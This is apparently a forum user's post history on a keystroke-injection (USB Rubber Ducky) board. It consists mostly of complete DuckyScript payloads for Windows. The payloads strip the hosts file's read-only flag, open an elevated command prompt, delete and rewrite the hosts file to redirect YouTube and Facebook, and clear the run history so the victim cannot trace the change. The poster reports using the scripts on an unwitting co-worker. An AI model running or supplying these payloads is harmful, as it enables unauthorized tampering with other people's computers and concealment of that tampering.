Jump to content

TakkeX

Active Members
  • Posts

    4
  • Joined

  • Last visited

Posts posted by TakkeX

  1. On a side note, you may want to also add a third redirect to the list. The "mobile" site was still accessible, but this should clear it up. Depending on how many sites you want to redirect, the second script should take about 40 seconds. :ph34r:

    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER

    STRING 74.125.228.97 MOBILE.FACEBOOK.COM
    ENTER

  2. After messing around with it a little bit, I cleaned it up.Then I successfully tested it on a lazy co-worker who surfs the net all day. :D This is written to have caps-lock on while running (not necessary), and the first script will "clear" the run history to prevent the target from locating the problem.

    Using this script the first time, the host files will be read-only. Use this:

    DELAY 3000
    DEFAULT_DELAY 250
    GUI r
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
    ENTER
    CONTROL A
    SHIFT F10
    STRING R
    DELAY 500
    SPACE
    ENTER
    ENTER
    DELAY 1000
    LEFT
    ENTER
    DELAY 1000
    ALT F4
    CONTROL ESCAPE
    DELAY 500
    STRING cmd
    DELAY 500
    MENU
    DELAY 500
    STRING A
    ENTER
    DELAY 750
    LEFT
    ENTER
    DELAY 750
    STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 500
    STRING %windir%\system32\notepad.exe
    ENTER
    DELAY 500
    DEFAULT_DELAY 0
    STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
    ENTER
    STRING #
    ENTER
    STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
    ENTER
    STRING #
    ENTER
    STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
    ENTER
    STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
    ENTER
    STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
    ENTER
    STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
    ENTER
    STRING # SPACE.
    ENTER
    STRING #
    ENTER
    STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
    ENTER
    STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
    ENTER
    STRING #
    ENTER
    STRING # fOR EXAMPLE:
    ENTER
    STRING #
    ENTER
    STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
    ENTER
    STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
    ENTER
    ENTER
    STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
    ENTER
    STRING # 127.0.0.1 LOCALHOST
    ENTER
    STRING # ::1 LOCALHOST
    ENTER
    ENTER
    STRING 74.125.228.97 YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 WWW.YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER
    DEFAULT_DELAY 250
    CONTROL S
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 1000
    ALT F4
    DELAY 500
    STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
    ENTER
    DELAY 500
    STRING EXIT
    ENTER
    DELAY 500
    GUI r
    STRING MSCONFIG
    ENTER
    DELAY 750
    ALT F4

    After using the previous script once, the host files will be read-write. Use this:

    DELAY 3000
    DEFAULT_DELAY 250
    CONTROL ESCAPE
    DELAY 500
    STRING cmd
    DELAY 500
    MENU
    DELAY 500
    STRING A
    ENTER
    DELAY 750
    LEFT
    ENTER
    DELAY 750
    STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 500
    STRING %windir%\system32\notepad.exe
    ENTER
    DELAY 500
    DEFAULT_DELAY 0
    STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
    ENTER
    STRING #
    ENTER
    STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
    ENTER
    STRING #
    ENTER
    STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
    ENTER
    STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
    ENTER
    STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
    ENTER
    STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
    ENTER
    STRING # SPACE.
    ENTER
    STRING #
    ENTER
    STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
    ENTER
    STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
    ENTER
    STRING #
    ENTER
    STRING # fOR EXAMPLE:
    ENTER
    STRING #
    ENTER
    STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
    ENTER
    STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
    ENTER
    ENTER
    STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
    ENTER
    STRING # 127.0.0.1 LOCALHOST
    ENTER
    STRING # ::1 LOCALHOST
    ENTER
    ENTER
    STRING 74.125.228.97 YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 WWW.YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER
    DEFAULT_DELAY 250
    CONTROL S
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 1000
    ALT F4
    DELAY 500
    STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
    ENTER
    DELAY 500
    STRING EXIT
    ENTER

  3. Since no one wanted to help, I did it all myself. Can anyone clean this up a bit? I am guessing that I made this too complicated. It is designed for Win XP and Win 7.

    Change hosts file (read-only) to redirect Youtube + Facebook to Google.

    DELAY 3000
    DEFAULT_DELAY 250
    GUI r
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\
    ENTER
    CONTROL A
    SHIFT F10
    STRING R
    DELAY 500
    SPACE
    ENTER
    ENTER
    DELAY 1000
    LEFT
    ENTER
    DELAY 1000
    ALT F4
    GUI d
    CONTROL N
    ALT f
    STRING W
    DELAY 500
    STRING S
    DELAY 500
    STRING CMD.EXE
    ENTER
    STRING COMMANDPROMPT
    ENTER
    DELAY 500
    STRING COMMANDPROMPT
    SHIFT F10
    STRING A
    ENTER
    DELAY 750
    LEFT
    ENTER
    DELAY 750
    STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 500
    STRING %windir%\system32\notepad.exe
    ENTER
    DELAY 500
    DEFAULT_DELAY 0
    STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
    ENTER
    STRING #
    ENTER
    STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
    ENTER
    STRING #
    ENTER
    STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
    ENTER
    STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
    ENTER
    STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
    ENTER
    STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
    ENTER
    STRING # SPACE.
    ENTER
    STRING #
    ENTER
    STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
    ENTER
    STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
    ENTER
    STRING #
    ENTER
    STRING # fOR EXAMPLE:
    ENTER
    STRING #
    ENTER
    STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
    ENTER
    STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
    ENTER
    ENTER
    STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
    ENTER
    STRING # 127.0.0.1 LOCALHOST
    ENTER
    STRING # ::1 LOCALHOST
    ENTER
    ENTER
    STRING 74.125.228.97 YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 WWW.YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER
    DEFAULT_DELAY 250
    CONTROL S
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 1000
    ALT F4
    DELAY 500
    STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
    ENTER
    DELAY 500
    STRING EXIT
    ENTER
    ALT F4
    GUI d
    CONTROL N
    STRING COMMANDPROMPT
    DELETE
    ENTER
    ALT F4

    Change hosts file (write access) to redirect Youtube + Facebook to Google.

    DELAY 3000
    DEFAULT_DELAY 250

    GUI d
    CONTROL N
    ALT f
    STRING W
    DELAY 500
    STRING S
    DELAY 500
    STRING CMD.EXE
    ENTER
    STRING COMMANDPROMPT
    ENTER
    DELAY 500
    STRING COMMANDPROMPT
    SHIFT F10
    STRING A
    ENTER
    DELAY 750
    LEFT
    ENTER
    DELAY 750
    STRING DEL %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 500
    STRING %windir%\system32\notepad.exe
    ENTER
    DELAY 500
    DEFAULT_DELAY 0
    STRING # cOPYRIGHT © 1993-2009 mICROSOFT cORP.
    ENTER
    STRING #
    ENTER
    STRING # tHIS IS A SAMPLE hosts FILE USED BY mICROSOFT tcp/ip FOR wINDOWS.
    ENTER
    STRING #
    ENTER
    STRING # tHIS FILE CONTAINS THE MAPPINGS OF ip ADDRESSES TO HOST NAMES. eACH
    ENTER
    STRING # ENTRY SHOULD BE KEPT ON AN INDIVIDUAL LINE. tHE ip ADDRESS SHOULD
    ENTER
    STRING # BE PLACED IN THE FIRST COLUMN FOLLOWED BY THE CORRESPONDING HOST NAME.
    ENTER
    STRING # tHE ip ADDRESS AND THE HOST NAME SHOULD BE SEPARATED BY AT LEAST ONE
    ENTER
    STRING # SPACE.
    ENTER
    STRING #
    ENTER
    STRING # aDDITIONALLY, COMMENTS (SUCH AS THESE) MAY BE INSERTED ON INDIVIDUAL
    ENTER
    STRING # LINES OR FOLLOWING THE MACHINE NAME DENOTED BY A '#' SYMBOL.
    ENTER
    STRING #
    ENTER
    STRING # fOR EXAMPLE:
    ENTER
    STRING #
    ENTER
    STRING # 102.54.94.97 RHINO.ACME.COM # SOURCE SERVER
    ENTER
    STRING # 38.25.63.10 X.ACME.COM # X CLIENT HOST
    ENTER
    ENTER
    STRING # LOCALHOST NAME RESOLUTION IS HANDLED WITHIN dns ITSELF.
    ENTER
    STRING # 127.0.0.1 LOCALHOST
    ENTER
    STRING # ::1 LOCALHOST
    ENTER
    ENTER
    STRING 74.125.228.97 YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 WWW.YOUTUBE.COM
    ENTER
    STRING 74.125.228.97 FACEBOOK.COM
    ENTER
    STRING 74.125.228.97 WWW.FACEBOOK.COM
    ENTER
    DEFAULT_DELAY 250
    CONTROL S
    STRING %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS
    ENTER
    DELAY 1000
    ALT F4
    DELAY 500
    STRING RENAME %WINDIR%\SYSTEM32\DRIVERS\ETC\HOSTS.TXT HOSTS
    ENTER
    DELAY 500
    STRING EXIT
    ENTER
    ALT F4
    GUI d
    CONTROL N
    STRING COMMANDPROMPT
    DELETE
    ENTER
    ALT F4

  4. Ello everyone,

    I am very new with the ducky, and I am looking for some help.

    As I understand, powershell must be installed for any of the "Duck Toolkit" payloads to work. I was interested in DNS poisioning, but I cant get it to work correctly. I even tried to remove the command prompt section and have an administrative cmd already up and running before I plugged in my ducky. Everything went smoothly, but it still did nothing. I have disabled all my anti-virus programs and even tried a few random other DNS poisioning/host mod scripts that I randomly found on here and other websites. No luck.

    Is there a way to:

    1. copy "hosts.txt" (pre-created file) from my single ducky sd card to the \Windows\System32\drivers\etc folder

    2. delete "hosts" file in \Windows\System32\drivers\etc folder

    3. rename "hosts.txt" to just "hosts"

    Please, no powershell. It seems pretty simple, but I still have no idea what I am doing. :wacko:

×
×
  • Create New...